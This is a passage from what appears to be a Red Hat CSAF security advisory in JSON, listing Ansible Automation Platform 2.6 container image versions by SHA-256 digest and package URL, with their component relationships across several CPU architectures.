"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Abb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Aade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3Acaf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Acf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Aee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Aac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Add48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Ac5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
